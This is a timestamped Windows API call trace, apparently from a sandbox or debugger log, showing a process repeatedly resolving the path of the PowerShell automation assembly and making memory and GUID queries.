	[0412.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.202] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.202] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.202] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.202] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.202] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.202] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.203] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.203] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.203] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.203] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.203] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.203] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.203] VirtualQuery (in: lpAddress=0xcba70, lpBuffer=0xcc930, dwLength=0x30 | out: lpBuffer=0xcc930*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.203] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.203] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.203] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.204] VirtualQuery (in: lpAddress=0xcba70, lpBuffer=0xcc930, dwLength=0x30 | out: lpBuffer=0xcc930*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.204] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.204] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.204] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.204] VirtualQuery (in: lpAddress=0xcba70, lpBuffer=0xcc930, dwLength=0x30 | out: lpBuffer=0xcc930*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.204] VirtualQuery (in: lpAddress=0xcb9d0, lpBuffer=0xcc890, dwLength=0x30 | out: lpBuffer=0xcc890*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.204] VirtualQuery (in: lpAddress=0xcba60, lpBuffer=0xcc920, dwLength=0x30 | out: lpBuffer=0xcc920*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.204] VirtualQuery (in: lpAddress=0xcb9d0, lpBuffer=0xcc890, dwLength=0x30 | out: lpBuffer=0xcc890*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.205] VirtualQuery (in: lpAddress=0xcba60, lpBuffer=0xcc920, dwLength=0x30 | out: lpBuffer=0xcc920*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.205] VirtualQuery (in: lpAddress=0xcba60, lpBuffer=0xcc920, dwLength=0x30 | out: lpBuffer=0xcc920*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.205] VirtualQuery (in: lpAddress=0xcb9d0, lpBuffer=0xcc890, dwLength=0x30 | out: lpBuffer=0xcc890*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.205] VirtualQuery (in: lpAddress=0xcba60, lpBuffer=0xcc920, dwLength=0x30 | out: lpBuffer=0xcc920*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.205] VirtualQuery (in: lpAddress=0xcb9d0, lpBuffer=0xcc890, dwLength=0x30 | out: lpBuffer=0xcc890*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.205] VirtualQuery (in: lpAddress=0xcba60, lpBuffer=0xcc920, dwLength=0x30 | out: lpBuffer=0xcc920*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.205] VirtualQuery (in: lpAddress=0xcb9d0, lpBuffer=0xcc890, dwLength=0x30 | out: lpBuffer=0xcc890*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.205] VirtualQuery (in: lpAddress=0xcba60, lpBuffer=0xcc920, dwLength=0x30 | out: lpBuffer=0xcc920*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.205] VirtualQuery (in: lpAddress=0xcb6a0, lpBuffer=0xcc560, dwLength=0x30 | out: lpBuffer=0xcc560*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.205] VirtualQuery (in: lpAddress=0xcb9d0, lpBuffer=0xcc890, dwLength=0x30 | out: lpBuffer=0xcc890*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.206] VirtualQuery (in: lpAddress=0xcba60, lpBuffer=0xcc920, dwLength=0x30 | out: lpBuffer=0xcc920*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.206] VirtualQuery (in: lpAddress=0xcb9d0, lpBuffer=0xcc890, dwLength=0x30 | out: lpBuffer=0xcc890*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.206] VirtualQuery (in: lpAddress=0xcba60, lpBuffer=0xcc920, dwLength=0x30 | out: lpBuffer=0xcc920*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.206] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0x4424bce2, Data2=0xe5e2, Data3=0x4baa, Data4=([0]=0x80, [1]=0x7a, [2]=0xee, [3]=0xd2, [4]=0xf6, [5]=0xfa, [6]=0x42, [7]=0xd1))) returned 0x0
	[0412.206] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.206] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.206] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.206] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.206] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.206] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.207] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0xee2b0eb, Data2=0xc912, Data3=0x47b5, Data4=([0]=0xa5, [1]=0x8a, [2]=0x4b, [3]=0xb0, [4]=0x7, [5]=0x2f, [6]=0x32, [7]=0xcd))) returned 0x0
	[0412.207] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.207] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.207] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.207] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.207] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.207] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.207] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.208] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.208] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.208] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.208] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.208] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.208] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.208] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.208] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
